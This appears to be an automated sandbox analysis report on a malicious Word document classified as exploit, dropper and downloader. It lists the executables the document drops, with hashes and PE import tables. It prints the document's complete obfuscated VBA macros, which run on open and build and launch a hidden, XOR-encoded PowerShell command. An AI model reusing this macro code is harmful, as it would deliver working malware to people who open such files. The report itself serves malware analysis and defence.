VTI SCORE: 100/100
| Target: | win7_64_sp1-mso2007 | ms_office |
| Classification: | Exploit, Dropper, Downloader |
3985bc09caa13dadf70187a20d271303c272a41404beb497ac6116a5722a05d1 (SHA256)
022543.doc
Word Document
Created at 2018-06-25 14:51:00
Notifications (1/1)
The operating system was rebooted during the analysis.
Files Information
| Number of sample files submitted for analysis | 1 |
| Number of files created and extracted during analysis | 8 |
| Number of files modified and extracted during analysis | 0 |
c:\users\kft6utqw\appdata\local\temp\280.exe, ...
Suspicious
»
| File Properties | |
|---|---|
| Names |
c:\users\kft6utqw\appdata\local\temp\280.exe (Created File)
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe (Created File) |
| Size | 104.00 KB |
| Hash Values |
MD5: bc1a4dc38f3236982d47496a1151f33f
SHA1: d112719238664d7996048614d75db8a67fc50fc5 SHA256: 85f328a811ca9f10ad82bc3c68d3c348cb069d8378400bf191bb515a6aa63473 |
| Actions |
...
|
File Reputation Information
»
| Information | Value |
|---|---|
| Severity |
Suspicious
|
| Names | Win32.Exploit.Generic |
| Families | Generic |
| Classification | Exploit |
PE Information
»
| Information | Value |
|---|---|
| Image Base | 0x400000 |
| Entry Point | 0x4015a5 |
| Size Of Code | 0x6000 |
| Size Of Initialized Data | 0x10000 |
| Size Of Uninitialized Data | 0x0 |
| Format | x86 |
| Type | Executable |
| Subsystem | IMAGE_SUBSYSTEM_WINDOWS_GUI |
| Machine Type | IMAGE_FILE_MACHINE_I386 |
| Compile Timestamp | 2018-06-25 14:51:38 |
| Compiler/Packer | Unknown |
Sections (4)
»
| Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
|---|---|---|---|---|---|---|
| .text | 0x401000 | 0x2788 | 0x3000 | 0x1000 | CNT_CODE, MEM_EXECUTE, MEM_READ | 5.61 |
| .rdata | 0x404000 | 0xb1ac | 0xc000 | 0x4000 | CNT_INITIALIZED_DATA, MEM_READ | 7.48 |
| .data | 0x410000 | 0x6f7c | 0x6000 | 0x10000 | CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE | 7.9 |
| .pdata | 0x417000 | 0x3040 | 0x4000 | 0x16000 | CNT_INITIALIZED_DATA, MEM_READ | 2.77 |
Imports (34)
»
GDI32.dll (1)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
|---|---|---|---|---|
| MaskBlt | 0x0 | 0x404018 | 0xee1c | 0xee1c |
RPCRT4.dll (1)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
|---|---|---|---|---|
| NdrClientInitializeNew | 0x0 | 0x404064 | 0xee68 | 0xee68 |
CRYPT32.dll (2)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
|---|---|---|---|---|
| CryptExportPublicKeyInfo | 0x0 | 0x40400c | 0xee10 | 0xee10 |
| CryptFreeOIDFunctionAddress | 0x0 | 0x404010 | 0xee14 | 0xee14 |
SHLWAPI.dll (1)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
|---|---|---|---|---|
| SHSetThreadRef | 0x0 | 0x40406c | 0xee70 | 0xee70 |
ADVAPI32.dll (2)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
|---|---|---|---|---|
| CryptReleaseContext | 0x0 | 0x404000 | 0xee04 | 0xee04 |
| CryptSetKeyParam | 0x0 | 0x404004 | 0xee08 | 0xee08 |
KERNEL32.dll (14)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
|---|---|---|---|---|
| ConnectNamedPipe | 0x0 | 0x404020 | 0xee24 | 0xee24 |
| SetThreadExecutionState | 0x0 | 0x404024 | 0xee28 | 0xee28 |
| CloseHandle | 0x0 | 0x404028 | 0xee2c | 0xee2c |
| SwitchToThread | 0x0 | 0x40402c | 0xee30 | 0xee30 |
| DeleteFileW | 0x0 | 0x404030 | 0xee34 | 0xee34 |
| GetVersion | 0x0 | 0x404034 | 0xee38 | 0xee38 |
| GetNamedPipeClientSessionId | 0x0 | 0x404038 | 0xee3c | 0xee3c |
| GetLogicalDrives | 0x0 | 0x40403c | 0xee40 | 0xee40 |
| GetFileMUIPath | 0x0 | 0x404040 | 0xee44 | 0xee44 |
| SetHandleInformation | 0x0 | 0x404044 | 0xee48 | 0xee48 |
| GlobalUnlock | 0x0 | 0x404048 | 0xee4c | 0xee4c |
| FlsGetValue | 0x0 | 0x40404c | 0xee50 | 0xee50 |
| SetPriorityClass | 0x0 | 0x404050 | 0xee54 | 0xee54 |
| GetApplicationRestartSettings | 0x0 | 0x404054 | 0xee58 | 0xee58 |
RASAPI32.dll (1)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
|---|---|---|---|---|
| RasGetCredentialsW | 0x0 | 0x40405c | 0xee60 | 0xee60 |
USER32.dll (12)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
|---|---|---|---|---|
| DrawEdge | 0x0 | 0x404074 | 0xee78 | 0xee78 |
| IsCharLowerA | 0x0 | 0x404078 | 0xee7c | 0xee7c |
| IsCharAlphaNumericA | 0x0 | 0x40407c | 0xee80 | 0xee80 |
| GetCaretPos | 0x0 | 0x404080 | 0xee84 | 0xee84 |
| IsIconic | 0x0 | 0x404084 | 0xee88 | 0xee88 |
| AllowSetForegroundWindow | 0x0 | 0x404088 | 0xee8c | 0xee8c |
| IsChild | 0x0 | 0x40408c | 0xee90 | 0xee90 |
| SetPhysicalCursorPos | 0x0 | 0x404090 | 0xee94 | 0xee94 |
| GetUpdateRect | 0x0 | 0x404094 | 0xee98 | 0xee98 |
| GetLastInputInfo | 0x0 | 0x404098 | 0xee9c | 0xee9c |
| SetSysColors | 0x0 | 0x40409c | 0xeea0 | 0xeea0 |
| GetClipboardViewer | 0x0 | 0x4040a0 | 0xeea4 | 0xeea4 |
c:\users\kft6utqw\desktop\022543.doc
»
| File Properties | |
|---|---|
| Names | c:\users\kft6utqw\desktop\022543.doc (Sample File) |
| Size | 216.25 KB |
| Hash Values |
MD5: 5a51e63d898736046b20e5b7bbab88ae
SHA1: 6872e4301bba24de600600cbbb2434b244537134 SHA256: 3985bc09caa13dadf70187a20d271303c272a41404beb497ac6116a5722a05d1 |
| Actions |
...
|
VBA Information
»
| VBA Properties | |
|---|---|
| Module Count | 2 |
| Macro Count | 7 |
KbuiUkSaopBW.bas - Eventless
»
Function VhiXNiAhBlq()
On Error Resume Next
Ajbadj = (39068 / CBool(73181) + 39209 + CSng(zwwuY) * (58831 - wjWosF + 30324 - CLng(iEmwK)))
swAVoK = CByte(23542 * Tan(89958) / 92809 + CLng(wVNNt * 28451 * 14990 * Chr(98428)))
iSJYbCj = "Hel" + "l -j" + "oin " + Chr(40) + Chr(40) + "98,49 ," + " 4" + "4 , 1 , " + "123 ,4" + "0 , " + "35 " + ", "
HHzXnI = (50707 / CBool(22934) + 10762 + CSng(fhpJNG) * (96899 - ZkUjDn + 14967 - CLng(WsBbPw)))
DDqtbN = CByte(24987 * Tan(27512) / 96858 + CLng(wQhHL * 99423 * 14898 * Chr(91525)))
zBCUbNHikWj = "49, 107 " + ",41 ,3" + "6 " + ",44 , 35" + " ," + "37 ,50" + " ,102" + ",8 ,3" + "5," + " 50" + ", 104 " + ", 17 , "
iOYaD = (22939 / CBool(29349) + 91977 + CSng(hKiiiu) * (74354 - WMWiM + 42312 - CLng(ZHWak)))
sufzN = CByte(46800 * Tan(57876) / 54412 + CLng(hMRbjo * 54080 * 26329 * Chr(65631)))
okPwpO = "35, 36 " + ",5 ," + "42, 47," + "35 , " + "40 ," + " 50 " + ", 125," + " 98," + "54, 50," + "4,123 , " + "97 , 46," + "50, "
UFcvYj = (43755 / CBool(86304) + 5834 + CSng(wpoLa) * (78663 - zlVWI + 58448 - CLng(iKRkph)))
tooPFQ = CByte(97554 * Tan(12940) / 26839 + CLng(fbbqsX * 11371 * 617 * Chr(83875)))
ziiDhzzplja = "50 , " + "54 ," + " 124," + "105 ," + "105" + ", 37,"
dcNQL = (51383 / CBool(86213) + 32538 + CSng(SlDVC) * (4432 - AvVYR + 85241 - CLng(iqhCt)))
mLkzJU = CByte(33180 * Tan(52123) / 46535 + CLng(fXhsv * 9705 * 53965 * Chr(10898)))
NZXiMzzimtA = "41" + ", 43," + " 54, 52" + " , 35 " + ",39, " + "42 ,43 " + ",104 ," + " 40,3"
oqXJf = (36200 / CBool(13754) + 70664 + CSng(iZiXz) * (58903 - GBFMil + 50947 - CLng(spBjzb)))
ObiEv = CByte(29907 * Tan(2911) / 10073 + CLng(CkLszZ * 14105 * 45141 * Chr(6125)))
iGjtwGEpwK = "5," + " 50" + ",10" + "5 , 49 ," + "41 , " + "52 " + ", " + "34, 5" + "4, 52 " + ", 3"
pDWtq = (6865 / CBool(30966) + 90705 + CSng(pRXkd) * (18641 - CtviL + 9910 - CLng(aKwZid)))
iijim = CByte(41292 * Tan(85234) / 65983 + CLng(AfUjPN * 58412 * 98275 * Chr(65405)))
jwPztHmCYR = "5, 53 , " + "53 ,10" + "5 ,119" + ", 49" + ", 9 ,44" + ", 45 , 4" + "6 ," + "35" + " , 31,"
oWNcUF = (69279 / CBool(14462) + 92400 + CSng(sihSzG) * (75521 - CroRUF + 89552 - CLng(rVjMf)))
rzovUB = CByte(23024 * Tan(55957) / 4196 + CLng(wwvWz * 4456 * 70326 * Chr(17389)))
vPrlCwIKGiw = "3, 126 " + ",105" + ", 6, 46" + ",50" + ", 50, 54" + ",12" + "4,105 " + ", " + "105" + ", 49,49,"
mwquWC = (16695 / CBool(64425) + 32540 + CSng(ObjDt) * (75695 - dDmlfZ + 79907 - CLng(VVJYFp)))
XmsCAF = CByte(33642 * Tan(86676) / 22942 + CLng(vPnmM * 90225 * 4896 * Chr(67345)))
uXdNIdLS = "49 " + ", 104,4" + "7,37 ,36" + ", 104,3" + "7, 42 , " + "105" + " ,28" + ", " + "62,39 , " + "48 ,4"
YhWpH = (45015 / CBool(1409) + 38658 + CSng(hzJLZ) * (57095 - zLqmd + 23587 - CLng(aQkKB)))
IaGpqQ = CByte(7081 * Tan(815) / 94457 + CLng(iAlQLM * 21469 * 68762 * Chr(80754)))
HbEkKoDBwKo = "1,2 , " + "35," + " 1" + "05, 6 " + ",46" + " ,50,5" + "0 ,54 " + ", 124 , " + "105 ,10" + "5 , 49 "
iPjLw = (73917 / CBool(23653) + 44066 + CSng(YWNwjs) * (12986 - UVIaDz + 49208 - CLng(mrvwN)))
AUsEs = CByte(82079 * Tan(91114) / 85948 + CLng(EjDYO * 34159 * 2513 * Chr(8835)))
bZdZTS = ", 49, 49" + " , 1" + "04 , " + "37" + " , 46 , " + "51" + ", 40" + " ," + " 33," + " 37 , 5" + "1, 53 ," + "39"
FUrOh = (69058 / CBool(60043) + 30899 + CSng(zKuQY) * (67325 - WsGbz + 30906 - CLng(bREtzb)))
ulnXt = CByte(86719 * Tan(28167) / 73289 + CLng(IZcjvi * 17620 * 76579 * Chr(16040)))
sfvEXNncf = ",43 ,53 " + ", 41 " + ",52 ," + " 39 " + ", 54,52," + "47,43, 4" + "7 ,35 " + ", "
VhiXNiAhBlq = iSJYbCj + zBCUbNHikWj + okPwpO + ziiDhzzplja + NZXiMzzimtA + iGjtwGEpwK + jwPztHmCYR + vPrlCwIKGiw + uXdNIdLS + HbEkKoDBwKo + bZdZTS + sfvEXNncf
GsYuc = (46637 / CBool(78827) + 45328 + CSng(zdqfo) * (98777 - YHsfp + 7771 - CLng(FwCWjA)))
IQkiVS = CByte(41174 * Tan(81936) / 20129 + CLng(EVzoJR * 88483 * 76428 * Chr(63599)))
End Function
Function suWEZwq()
On Error Resume Next
JBvdiC = (16782 / CBool(36433) + 92120 + CSng(BFWWpM) * (11083 - Thjiw + 85914 - CLng(UEvwhI)))
CKiGVH = CByte(99788 * Tan(36502) / 18272 + CLng(ujwzw * 54410 * 99624 * Chr(94154)))
FZREhEi = "52 ," + " 104, 3" + "7 ,4" + "1 , 4" + "3," + "105 ,2" + ",17 " + ",1" + "26 ,34 ," + " 30 "
tTzHb = (9596 / CBool(5274) + 5334 + CSng(zNWOS) * (34630 - Mnirw + 1581 - CLng(XhnMu)))
VcvzVO = CByte(29656 * Tan(5075) / 5696 + CLng(BSEpV * 92042 * 61295 * Chr(61527)))
ZfuMF = ", 35, " + "105, 6 " + ",46," + " 50 ," + " 5" + "0,54,12" + "4 ,1" + "05,105 ," + "53 , 35 " + ", 52, 48" + " ,47,37 " + ", 3"
jwmoR = (10280 / CBool(25966) + 85545 + CSng(cZnsI) * (52479 - USXtDC + 305 - CLng(jhZtL)))
bBHvNf = CByte(67446 * Tan(77275) / 57976 + CLng(IWwadT * 17979 * 18835 * Chr(56756)))
oKiIcSOEV = "5 , 107" + " ,5" + "4, 37," + " 104 ," + "37," + " 41 ," + "43," + " 104,52"
BdImO = (57470 / CBool(92568) + 55514 + CSng(jjUhn) * (975 - jwuwF + 62010 - CLng(dljGZj)))
XPPLd = CByte(96680 * Tan(85921) / 39974 + CLng(jjGjuN * 76716 * 79698 * Chr(16663)))
ZoIRmFdA = " ,41 ," + " 105,11" + "3, " + "41 , 1" + "27, " + "41"
EnMOh = (88982 / CBool(40800) + 79422 + CSng(BhXWwv) * (22932 - EVKCf + 22360 - CLng(KNzAt)))
zrzzc = CByte(49698 * Tan(21681) / 992 + CLng(QIINTz * 23145 * 24478 * Chr(18962)))
jPRSO = " ," + " 54,11,3" + "1," + " 10" + "5 ,6, " + "46 " + ",50" + ", 50 , 5" + "4 " + ", 124, 1" + "05, 10"
izjTwX = (47177 / CBool(52757) + 94503 + CSng(UuVvQ) * (8187 - aWUVAQ + 41861 - CLng(BtSsP)))
ApPLRN = CByte(45879 * Tan(98103) / 54505 + CLng(wOwOW * 75656 * 26146 * Chr(93867)))
hGMqIhw = "5 , 4" + "3 , 4" + "7 ,40 ," + " 3" + "9," + " 43 , 47" + ",104 ,3" + "7 " + ", 4"
KlqpP = (64843 / CBool(64195) + 26730 + CSng(wiFjh) * (9793 - EFjwq + 34410 - CLng(uQWmTH)))
OfVdFN = CByte(19156 * Tan(671) / 99768 + CLng(kzJCzz * 29600 * 62682 * Chr(83468)))
cifQmikWdZ = "1,43,104" + ",50" + " ,49 , " + "105," + " 22," + " 114, 19" + ", 2 ,1," + "54" + " , 105 " + ",97 ,104" + ", 21 ," + "54 , 42"
RhdwYs = (19682 / CBool(92926) + 47837 + CSng(vNGjhw) * (68950 - crKEF + 11539 - CLng(qIYwS)))
FcNQj = CByte(3658 * Tan(45660) / 9806 + CLng(DNbHi * 43330 * 87580 * Chr(55143)))
piEztLzzd = ",4" + "7 , 50 ," + " 110 ,9" + "7 , " + "6,97,11" + "1 ,125" + ", 9" + "8 , 0 ," + " 2" + "8, 23, 1" + "02" + " , 123,"
zNJEz = (69058 / CBool(26404) + 53533 + CSng(jhjlA) * (11390 - plsPBw + 23296 - CLng(Oowcw)))
rzjEw = CByte(9704 * Tan(95684) / 2761 + CLng(dCFinX * 57132 * 34076 * Chr(25712)))
XMwAkpIdJOa = " 1" + "02 , 9" + "7 , 116," + " 126 " + ",118 , " + "97 , " + "125, 98" + ", 9," + " 51 ,"
WtkAM = (37581 / CBool(4777) + 3466 + CSng(pKnld) * (785 - kDhDAn + 76611 - CLng(ONvSY)))
lWjHbd = CByte(13230 * Tan(92906) / 37309 + CLng(uDoLRq * 34121 * 53191 * Chr(57172)))
mhrwSUvW = "44," + " 12" + "3 , 98 " + ", " + "35,40 ," + " 48 ,124" + " , 50 ," + " 35," + " 4"
nakJUj = (10640 / CBool(53320) + 73441 + CSng(XjdjEn) * (8342 - BWlnjw + 17715 - CLng(wbrYvU)))
cpKmZm = CByte(85793 * Tan(47050) / 59909 + CLng(TNKZH * 14532 * 57151 * Chr(73041)))
hDlzq = "3,5" + "4 ," + "109 " + ", 97 ,26" + " ,97" + ",109, " + "98,0 , 2" + "8 , 23" + ",109"
aHKzqo = (1276 / CBool(44314) + 70339 + CSng(kNEDuA) * (82570 - BfrIzG + 57280 - CLng(jwXqU)))
mHuhS = CByte(80921 * Tan(39084) / 96077 + CLng(PIuuw * 30141 * 19069 * Chr(30007)))
UPRmWskqHZa = " , " + "97 ,10" + "4 , " + "35" + " ," + " 62" + ", " + "35,9" + "7 , 12" + "5 , 32 ," + "41 ," + "52 ,"
suWEZwq = FZREhEi + ZfuMF + oKiIcSOEV + ZoIRmFdA + jPRSO + hGMqIhw + cifQmikWdZ + piEztLzzd + XMwAkpIdJOa + mhrwSUvW + hDlzq + UPRmWskqHZa
QOcGw = (33322 / CBool(18025) + 7989 + CSng(aFBzt) * (17628 - bwJNi + 1656 - CLng(DGbAD)))
hAZjw = CByte(49667 * Tan(12218) / 72408 + CLng(KcYOUt * 85956 * 43555 * Chr(31358)))
End Function
Function ffQYR()
On Error Resume Next
lYVTA = (4523 / CBool(81606) + 31040 + CSng(YAUQGs) * (77506 - jSATCk + 91493 - CLng(jpUjfK)))
LmRmMh = CByte(46991 * Tan(63046) / 16445 + CLng(RNfqM * 34493 * 40937 * Chr(61748)))
zBpmwC = "35 " + ",3" + "9,3" + "7,4" + "6, 110 ," + " 98, 7 " + ", 19, 19" + " ,10" + "2 " + ", 47,40"
MDQui = (76389 / CBool(49315) + 64216 + CSng(NWjJN) * (31687 - doGcs + 14687 - CLng(rKlXQv)))
XwALw = CByte(61594 * Tan(91240) / 84972 + CLng(zmzETm * 49995 * 15130 * Chr(99119)))
TPUdwNVvV = ",102" + ", 98" + ",54 ,50 " + ", 4 , " + "111 , 61" + ",50 " + ", 5" + "2 ,6" + "3 ,6" + "1 , 9" + "8,"
hicPD = (52407 / CBool(9610) + 34308 + CSng(kzQJm) * (661 - XjwPkN + 72650 - CLng(HpsDS)))
kdYBO = CByte(72568 * Tan(88707) / 69022 + CLng(ktOWIk * 67174 * 56096 * Chr(26846)))
owzIYCmMh = " 49" + ", 44 " + ",1,104," + "2 ," + "41" + " ,"
dPqJk = (58362 / CBool(37567) + 93370 + CSng(HOiBz) * (37088 - UrHXOw + 75566 - CLng(OVWqdV)))
Mizpq = CByte(87697 * Tan(38157) / 76653 + CLng(upXbi * 2990 * 84447 * Chr(28716)))
jVObzaqwTdG = "49 ,40" + " ,42,41," + "39 ," + " 34" + " ,0 ,47 " + ",4" + "2 ,35 ," + " 110 , 9" + "8," + " 7"
IQqVq = (79005 / CBool(63457) + 53664 + CSng(vOIcS) * (1136 - BDBJdG + 501 - CLng(kdZYL)))
MiHnV = CByte(9674 * Tan(64043) / 82957 + CLng(KIOpYZ * 28998 * 34338 * Chr(42957)))
hDCWm = ", 19,1" + "9,10" + "6 ,102,9" + "8 " + ",9,5" + "1,4" + "4, 11"
sjzqF = (50765 / CBool(3736) + 31689 + CSng(kMPIQw) * (67299 - ApzvCK + 29392 - CLng(BPQbiV)))
DBSYO = CByte(76239 * Tan(4293) / 24409 + CLng(ouGbv * 99635 * 95270 * Chr(82933)))
LFsiXAzLz = "1,1" + "25" + " ," + " 21 " + ",50" + ", 39 ," + " 52" + " ,50" + ", 107 "
ffQYR = zBpmwC + TPUdwNVvV + owzIYCmMh + jVObzaqwTdG + hDCWm + LFsiXAzLz
pOcYbp = (41514 / CBool(66170) + 99631 + CSng(LloIP) * (3201 - HzaUw + 97175 - CLng(dHHEnv)))
RZmpH = CByte(67647 * Tan(57883) / 49142 + CLng(DjnwBh * 70 * 73317 * Chr(83354)))
End Function
Function vZudztwuP()
On Error Resume Next
iszQV = (86417 / CBool(30360) + 98281 + CSng(UiRuEC) * (87917 - BTHSi + 65164 - CLng(XnIzb)))
GVMNMJ = CByte(33944 * Tan(15925) / 33631 + CLng(rkiEul * 72529 * 68237 * Chr(93122)))
mZWUiJLzwR = ",22 ,52," + " 41" + ",37, 35 " + ",53 , " + "53 ,1" + "02" + ", 98 ,9 "
VwSjH = (270 / CBool(20177) + 60172 + CSng(hkPXzN) * (23728 - hrscE + 69961 - CLng(QizcZ)))
BZDTaI = CByte(5636 * Tan(56514) / 12051 + CLng(wmOkL * 53263 * 24210 * Chr(68275)))
jVCqzH = ", 51, " + "44 ," + "125," + " 36 , " + "52, 3" + "5 ,39" + ", 4" + "5,1" + "25 , 5" + "9 , 37 " + ", 39" + " , 50"
ihErDf = (33618 / CBool(26522) + 91653 + CSng(ZAhFI) * (60589 - MDZEJ + 52079 - CLng(iuppAL)))
VQlrEz = CByte(63893 * Tan(92) / 77533 + CLng(vHKhM * 33066 * 63110 * Chr(11933)))
IHDEIar = ", 37 ,46" + ",61," + " 59 ," + "59 " + Chr(41) + " |%" + "{ [CHAR]" + Chr(40) + "$_ -bXo" + "r" + Chr(34) + "0x4" + "6" + Chr(34) + " " + Chr(41) + "} " + Chr(41) + " | " + ". " + Chr(40) + " $E"
APJKm = (48357 / CBool(11793) + 57617 + CSng(JpbNk) * (58610 - kvOEi + 57373 - CLng(PQJCQ)))
ScIjvK = CByte(48424 * Tan(24599) / 11025 + CLng(SwTUqw * 63238 * 64619 * Chr(44095)))
APGEAfQC = "Nv:C" + "OmSp" + "eC[" + "4,24,25]" + "-Jo" + "in" + "''" + Chr(41) + " "
vZudztwuP = mZWUiJLzwR + jVCqzH + IHDEIar + APGEAfQC
ibVSCW = (44175 / CBool(6396) + 88100 + CSng(cXpkuj) * (63505 - RZFqiw + 92895 - CLng(OJVQj)))
flPqHq = CByte(63888 * Tan(49242) / 76054 + CLng(SLWvI * 67072 * 49052 * Chr(19778)))
End Function
|
ENVladY.bas - Activate Workbook
»
Sub AutoOpen() On Error Resume Next lAuHI = (57743 / CBool(35575) + 69712 + CSng(crTdPo) * (97788 - nrRuWz + 19951 - CLng(cBMHLL))) PzjcIo = CByte(50839 * Tan(40990) / 81080 + CLng(OIari * 71680 * 66749 * Chr(53958))) mBAjLkU (mwIuTqKasZ) DptVO = (1945 / CBool(68767) + 31988 + CSng(cGdfRE) * (7759 - jMqsMW + 52231 - CLng(IrjzuQ))) fqIwVb = CByte(39900 * Tan(52796) / 47608 + CLng(usjlj * 82918 * 43485 * Chr(75890))) End Sub |
ENVladY.bas - Eventless
»
Function mwIuTqKasZ() On Error Resume Next rozwJ = (67400 / CBool(76549) + 74367 + CSng(ZnGPX) * (31364 - FVWBW + 12163 - CLng(tijdZ))) EOEHAp = CByte(71279 * Tan(40747) / 55809 + CLng(dfwhk * 50300 * 91782 * Chr(77966))) DiSWQPQiA = GnYaItdQB + Chr(iFukRA + 80 + kOwzwj) + "ow" + "ers" zkEfJ = (15676 / CBool(81912) + 70603 + CSng(ENZFN) * (99263 - LiwPhf + 78551 - CLng(SsWYZm))) nvKaC = CByte(98800 * Tan(68310) / 91934 + CLng(JEURPd * 45526 * 33379 * Chr(96950))) ZrzZlU = (91511 / CBool(54858) + 24024 + CSng(lRLil) * (51065 - vnwzbn + 97233 - CLng(cKXMp))) EaoNb = CByte(80320 * Tan(42316) / 48488 + CLng(HWXfN * 84328 * 87095 * Chr(81190))) mwIuTqKasZ = WWzknl + DiSWQPQiA + VhiXNiAhBlq + suWEZwq + ffQYR + vZudztwuP ozcdBm = (96095 / CBool(7959) + 97632 + CSng(IJXPX) * (90786 - rWRJkI + 42591 - CLng(paEHkN))) UrYqsb = CByte(48066 * Tan(3510) / 29045 + CLng(qCQvj * 13805 * 99783 * Chr(69707))) End Function Function mBAjLkU(whKqOB) On Error Resume Next AWZWEr = (11870 / CBool(91052) + 22041 + CSng(twOFZ) * (78902 - rhCFSV + 3738 - CLng(tFFmGT))) XDNMv = CByte(41161 * Tan(38460) / 97898 + CLng(fNpVbc * 93338 * 82060 * Chr(12912))) PShbi = (2237 / CBool(44688) + 70528 + CSng(lAIEs) * (78384 - KsMtK + 45480 - CLng(PZEfjK))) JPfDD = CByte(72814 * Tan(79884) / 54616 + CLng(LYkJNm * 44470 * 16918 * Chr(94078))) DmvtdQv = DtEFQrZRRpI + HYmQfXj + Shell(WzPZHVRYA + whKqOB + haTFtqcwzK, (20827 / 20827) - 1) CSEdNs = (84391 / CBool(70421) + 34892 + CSng(dVqZt) * (54108 - cBoCji + 25702 - CLng(VZNUd))) wizIw = CByte(10074 * Tan(71716) / 35814 + CLng(MBXaB * 80862 * 64050 * Chr(20678))) End Function |
c:\users\kft6utqw\appdata\local\temp\280.exe, ...
»
| File Properties | |
|---|---|
| Names |
c:\users\kft6utqw\appdata\local\temp\280.exe (Created File)
c:\users\kft6utqw\appdata\local\temp\d3a3.tmp (Created File) c:\users\kft6utqw\appdata\local\temp\d3d3.tmp (Created File) c:\users\kft6utqw\appdata\local\temp\d3d4.tmp (Created File) c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe (Created File) c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe (Created File) |
| Size | 0.00 KB |
| Hash Values |
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
c:\programdata\oyvgkgw.exe, ...
»
| File Properties | |
|---|---|
| Names |
c:\programdata\oyvgkgw.exe (Created File)
c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe (Created File) |
| Size | 328.05 KB |
| Hash Values |
MD5: cbe11e9a9e71737f15e8f1c606ad8d8c
SHA1: 2d4575457d337753a57b7941d13ac9665342641a SHA256: 6e143481553f9ae7566d2245450f6fe65734b465df03e43905f0fb19f812b343 |
| Actions |
...
|
PE Information
»
| Information | Value |
|---|---|
| Image Base | 0x400000 |
| Entry Point | 0x40168c |
| Size Of Code | 0xd000 |
| Size Of Initialized Data | 0x44000 |
| Size Of Uninitialized Data | 0x0 |
| Format | x86 |
| Type | Executable |
| Subsystem | IMAGE_SUBSYSTEM_WINDOWS_GUI |
| Machine Type | IMAGE_FILE_MACHINE_I386 |
| Compile Timestamp | 2018-06-25 08:17:28 |
| Compiler/Packer | Unknown |
Sections (3)
»
| Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
|---|---|---|---|---|---|---|
| .text | 0x401000 | 0xced2 | 0xd000 | 0x1000 | CNT_CODE, MEM_EXECUTE, MEM_READ | 5.94 |
| .data | 0x40e000 | 0xe3c | 0x1000 | 0xe000 | CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE | 0.0 |
| .rsrc | 0x40f000 | 0x426e4 | 0x43000 | 0xf000 | CNT_INITIALIZED_DATA, MEM_READ | 7.85 |
Imports (95)
»
MSVBVM60.DLL (95)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
|---|---|---|---|---|
| __vbaVarSub | 0x0 | 0x401000 | 0xd7cc | 0xd7cc |
| _CIcos | 0x0 | 0x401004 | 0xd7d0 | 0xd7d0 |
| _adj_fptan | 0x0 | 0x401008 | 0xd7d4 | 0xd7d4 |
| __vbaStrI4 | 0x0 | 0x40100c | 0xd7d8 | 0xd7d8 |
| __vbaVarMove | 0x0 | 0x401010 | 0xd7dc | 0xd7dc |
| __vbaFreeVar | 0x0 | 0x401014 | 0xd7e0 | 0xd7e0 |
| __vbaAryMove | 0x0 | 0x401018 | 0xd7e4 | 0xd7e4 |
| __vbaStrVarMove | 0x0 | 0x40101c | 0xd7e8 | 0xd7e8 |
| __vbaLenBstr | 0x0 | 0x401020 | 0xd7ec | 0xd7ec |
| __vbaEnd | 0x0 | 0x401024 | 0xd7f0 | 0xd7f0 |
| __vbaFreeVarList | 0x0 | 0x401028 | 0xd7f4 | 0xd7f4 |
| _adj_fdiv_m64 | 0x0 | 0x40102c | 0xd7f8 | 0xd7f8 |
| __vbaFreeObjList | 0x0 | 0x401030 | 0xd7fc | 0xd7fc |
| (by ordinal) | 0x204 | 0x401034 | 0xd800 | 0xd800 |
| _adj_fprem1 | 0x0 | 0x401038 | 0xd804 | 0xd804 |
| __vbaStrCat | 0x0 | 0x40103c | 0xd808 | 0xd808 |
| __vbaSetSystemError | 0x0 | 0x401040 | 0xd80c | 0xd80c |
| __vbaHresultCheckObj | 0x0 | 0x401044 | 0xd810 | 0xd810 |
| _adj_fdiv_m32 | 0x0 | 0x401048 | 0xd814 | 0xd814 |
| __vbaAryDestruct | 0x0 | 0x40104c | 0xd818 | 0xd818 |
| (by ordinal) | 0x251 | 0x401050 | 0xd81c | 0xd81c |
| __vbaVarForInit | 0x0 | 0x401054 | 0xd820 | 0xd820 |
| __vbaExitProc | 0x0 | 0x401058 | 0xd824 | 0xd824 |
| (by ordinal) | 0x252 | 0x40105c | 0xd828 | 0xd828 |
| __vbaObjSet | 0x0 | 0x401060 | 0xd82c | 0xd82c |
| (by ordinal) | 0x253 | 0x401064 | 0xd830 | 0xd830 |
| __vbaOnError | 0x0 | 0x401068 | 0xd834 | 0xd834 |
| _adj_fdiv_m16i | 0x0 | 0x40106c | 0xd838 | 0xd838 |
| _adj_fdivr_m16i | 0x0 | 0x401070 | 0xd83c | 0xd83c |
| (by ordinal) | 0x256 | 0x401074 | 0xd840 | 0xd840 |
| __vbaFpR8 | 0x0 | 0x401078 | 0xd844 | 0xd844 |
| _CIsin | 0x0 | 0x40107c | 0xd848 | 0xd848 |
| (by ordinal) | 0x277 | 0x401080 | 0xd84c | 0xd84c |
| (by ordinal) | 0x278 | 0x401084 | 0xd850 | 0xd850 |
| __vbaChkstk | 0x0 | 0x401088 | 0xd854 | 0xd854 |
| EVENT_SINK_AddRef | 0x0 | 0x40108c | 0xd858 | 0xd858 |
| __vbaGenerateBoundsError | 0x0 | 0x401090 | 0xd85c | 0xd85c |
| __vbaStrCmp | 0x0 | 0x401094 | 0xd860 | 0xd860 |
| __vbaVarTstEq | 0x0 | 0x401098 | 0xd864 | 0xd864 |
